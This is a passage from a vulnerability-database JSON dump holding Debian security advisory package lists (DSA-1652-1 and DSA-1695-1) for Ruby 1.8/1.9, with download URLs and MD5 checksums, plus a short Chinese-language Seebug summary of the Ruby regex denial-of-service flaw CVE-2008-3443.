46554d54bc95ad8bf90ec33d7c848358\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 236300 1e4719db3ca36aa6b04dc3a66bb3b4f2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 220598 3cff195de849212b8bf1c0d2cb4f459b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 351424 99c548dbb54ad64f2f15ec9d6cd1157b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 351114 67c71c75847c6c24873a077214c6ddb8\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_ia64.deb\n Size/MD5 checksum: 1863980 ba885ff9a4bee389cdda5439f9b8838d\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 
checksum: 216034 540daf8a0a152b77cbabc0ebf2a6cbe6\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 215910 08152af050881fd103cbd3c6283f4c5f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 215178 6189e81e3d1fcb8bc3aa64ae688c6736\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 1862054 3f09c78df3df2ecafca65180509eeb30\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 236092 0a9c0b2b8031289e850c3a2c9a026e92\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 874098 447b15d2db96e1d6212b721b70289aa9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 1680114 aa610eb8728da1c4d45b7d54a4b09058\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 372246 96a282c7252c4edef7ba6712a26dfe6f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_mips.deb\n Size/MD5 checksum: 301600 3d528eda6e6da71c3dc5bfb92ac7a131\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 1837274 08174e2e8d1128b3977dedcd49d88adf\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 215368 c53207b03169c21fae94fc9a252030e0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 216122 217425b4ced3f5e260f7c3e16067ccc9\n 
http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 367470 ad1121d68848d0dd69c37ede15c611b1\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 1667940 7a061e90f07190e08cb1d7dd87ceba0b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 299388 46bc91d4748b41dc94e047bab5dedd51\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 216268 d71b6f0a4b75fb7e1251e69d746ca7c6\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 858514 9670a0b7dae56385110e24a689a2bba8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_mipsel.deb\n Size/MD5 checksum: 235568 f81cd64d18fd7d9ad05be290eaa3a2f7\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 218494 e3554e99b745b152c5adceb8b792598b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 218182 5d950d3fe9d4144a4a113febc734a657\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 312442 ba212e89d3ed795826291b8b83b755bf\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 1808838 f27c1864da2a5f200eba5f856ab9ec4d\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 217620 c293eeeff7ea8f7b2662543f1787e382\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 237222 
ba705f2b59847458ae944c9d88cfa29e\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 777068 75b95c3a7627b97ed7cb6b65b2d430d4\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 372912 2082b7a24c82d5c444d9a8e9971d153c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_powerpc.deb\n Size/MD5 checksum: 1844652 17411d10899861a4e0db3f2b58aa2f04\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 327718 deaec089c668e98c3826f9c3f9c16906\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 217444 091b5e0da9d7f8cab82fbaac51555800\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 1849530 a4eb5998265e1c0d10e47d9b3fd3376a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 371458 38d13d9c042fa13cb83e056dd6f75876\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 1855840 f311eafe38b79f66c8ed62d750516e3c\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 235460 c8e69420f67a74626d536b1e0634a5ee\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 884264 cb34a6a0e54e9699c2cc2527721e334a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 checksum: 217506 f0ee0fdfef50c2442f8ef375e1830575\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_s390.deb\n Size/MD5 
checksum: 217974 62409b7918e14178a04f381f14b0b009\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 822856 9506219f2b044210b34532e0900c843d\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 216666 1fdc236fbbcc05ec4dcb69f287e26d4a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 372806 a217f49c1f19fa3c8fdcebc6120b89e7\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 1843374 5f6e40930829a86a4694231a1312e5b9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 216752 7e5681d7aa0e675b3fe26e83f146ac94\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 1793464 023e643cbaca8191e5c213e228a59150\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 317666 4e0e420084673e075456a2cc78102cf2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 215972 20c5e03b7c7cad010b849fdcd77f9dbf\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch3_sparc.deb\n Size/MD5 checksum: 235354 2ce73be64e9f94b1beff935e7ffcba2f\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show 
<pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2008-10-12T09:38:22", "published": "2008-10-12T09:38:22", "id": "DEBIAN:DSA-1652-1:B2D5C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00244.html", "title": "[SECURITY] [DSA 1652-1] New ruby1.9 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "seebug": [{"lastseen": "2017-11-19T21:19:34", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 30682\r\nCVE(CAN) ID: CVE-2008-3443\r\n\r\nRuby\u662f\u4e00\u79cd\u529f\u80fd\u5f3a\u5927\u7684\u9762\u5411\u5bf9\u8c61\u7684\u811a\u672c\u8bed\u8a00\u3002\r\n\r\nRuby\u7684\u6b63\u5219\u8868\u8fbe\u5f0f\u5f15\u64ce\uff08regex.c\uff09\u6ca1\u6709\u6b63\u786e\u5730\u4e3a\u5957\u63a5\u5b57\u5206\u914d\u5185\u5b58\uff0c\u5982\u679c\u8fdc\u7a0b\u653b\u51fb\u8005\u5411ruby\u5957\u63a5\u5b57\u53d1\u9001\u4e86\u591a\u4e2a\u8d85\u957f\u8bf7\u6c42\u7684\u8bdd\uff0c\u5c31\u4f1a\u5bfc\u81f4ruby\u9677\u5165\u6b7b\u5faa\u73af\u5e76\u5d29\u6e83\u3002\r\n\n\nYukihiro Matsumoto Ruby 1.9.x\r\nYukihiro Matsumoto Ruby 1.8.x\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nDebian\r\n------\r\nDebian\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08DSA-1695-1\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nDSA-1695-1\uff1aNew Ruby packages fix denial of service\r\n\u94fe\u63a5\uff1a<a href=http://www.debian.org/security/2009/dsa-1695 target=_blank rel=external nofollow>http://www.debian.org/security/2009/dsa-1695</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n\r\nSource archives:\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz</a>\r\nSize/MD5 checksum: 4434227 aae9676332fcdd52f66c3d99b289878f\r\n<a 
href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.dsc target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.dsc</a>\r\nSize/MD5 checksum: 1102 1c38e939e74513153ee6677ef9f85b0d\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.diff.gz target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.diff.gz</a>\r\nSize/MD5 checksum: 176939 2fea21ebd5e29d26714843fa415d6310\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.diff.gz target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.diff.gz</a>\r\nSize/MD5 checksum: 32843 859c9ba559722e156d6931f3c8c347a4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609.orig.tar.gz target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609.orig.tar.gz</a>\r\nSize/MD5 checksum: 4450198 483d9b46a973c7e14f7586f0b1129891\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.dsc target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.dsc</a>\r\nSize/MD5 checksum: 1379 cbcf9f41397f2658e1db5ebae0178ccd\r\n\r\nArchitecture independent packages:\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-examples_1.9.0+20060609-1etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-examples_1.9.0+20060609-1etch4_all.deb</a>\r\nSize/MD5 checksum: 265870 fc302abc0465ab56ccd16fc0e724885c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/irb1.9_1.9.0+20060609-1etch4_all.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/irb1.9_1.9.0+20060609-1etch4_all.deb</a>\r\nSize/MD5 checksum: 255764 40a840e93b23abfe83f06fb68e411ecc\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch4_all.deb</a>\r\nSize/MD5 checksum: 309788 1a32b37a2ae266825239d31479481202\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch4_all.deb</a>\r\nSize/MD5 checksum: 1232694 0f2de56be8bf69925bdd69c0ebdb6e88\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-elisp_1.9.0+20060609-1etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-elisp_1.9.0+20060609-1etch4_all.deb</a>\r\nSize/MD5 checksum: 229450 c445df6488d98bba432cad422b2d26d2\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ri1.9_1.9.0+20060609-1etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ri1.9_1.9.0+20060609-1etch4_all.deb</a>\r\nSize/MD5 checksum: 694310 ba20a22e37fe3128ba68065e81b34be2\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/rdoc1.9_1.9.0+20060609-1etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/rdoc1.9_1.9.0+20060609-1etch4_all.deb</a>\r\nSize/MD5 checksum: 318608 107093187b68a01e89937e5595ada72f\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch4_all.deb</a>\r\nSize/MD5 checksum: 235540 742511548e73ce861aec2ebced3bb820\r\n<a 
href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch4_all.deb</a>\r\nSize/MD5 checksum: 210174 3f151d4c5e251849b7bc82a4c0cc6717\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch4_all.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch4_all.deb</a>\r\nSize/MD5 checksum: 243302 af6b1eacf4c03bc3fe53e3c2a8e13044\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 199212 7450977513c7006dd667426d5499092c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 324692 f53f9acfd76ea3a29a8ef4892f2b573a\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 237774 e9a60d0d7c8f73357b09bb6188070e21\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 217606 1479ee1a4b51cb0a75783b2f3844723b\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_alpha.deb target=_blank 
rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 219472 952a4e672625ce7f2529493b00364604\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 301142 fb710ce9d21ff1fb7f8a3808fcb78d60\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 216946 515718544ab0101093c6a57e63cb1cb8\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 903520 d39e018101c51c880e2cd9895a88a1f8\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 961022 f6d226e51af5740c5bda5772cf20e8a8\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 217630 292a9b82a47bd1bc3c7b4ab440029cca\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 198300 
653c076799344535ac9b6a791ffb132d\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 1881422 2eb8f5dd96ced6eac7473eed467c5663\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 1869092 3d45f58f803de6208f28d5267be89ecf\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 199236 81f0b4078e9412536836f8b973756318\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 1074308 f3ec5b9b0349dbc5ef735942a997327c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 1890052 5779555b10f64a438773cbf048ac545c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_alpha.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_alpha.deb</a>\r\nSize/MD5 checksum: 340202 69dd9f78aca79c5e05b191d7163a01b4\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_alpha.deb 
target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_alpha.deb</a>\r\nSize/MD5 checksum: 1638634 ed825a333226565b4b98b32b93cd1fe6\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 807592 464c13292ce358b22247cc998f743562\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 216630 867bdeff043830d6bad157d1931dc948\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 235632 c4ad4cb0bb9cd697534a2c262100c6cc\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 198112 17cd7156a45a5aff5c27d82e268a3c4d\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 1070604 1bddf59e7b60371ff8099b08bf75ac30\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external 
nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 1850656 aa571b58631a8557f7019d592636f481\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 749162 af403f99a95355682a54909929e5199a\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 216080 a43f4b0559aa2c9b50ea5d7973162aa2\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 197652 a9e00dc85e9f2cae38eb09e899130248\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 217322 9e02a9f097c955e4400812f0c04d7508\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 1830274 53805790080b4cd1daf1a4d63ed8256c\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 1878288 
01c7b13369a8758303404727fea129fd\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 301112 987113850c63d29874841e5faff83d89\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_amd64.deb</a>\r\nSize/MD5 checksum: 198726 4d65ce2e10feab441a946a18023daf42\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_amd64.deb target=_blank rel=external nofollow>http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_amd64.deb</a>\r\nSize/MD5 checksum: 216568 93fe5252d04959e64dc6576d95b7c2b6\r\n<a href=http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_amd64.deb target=_blank rel=external 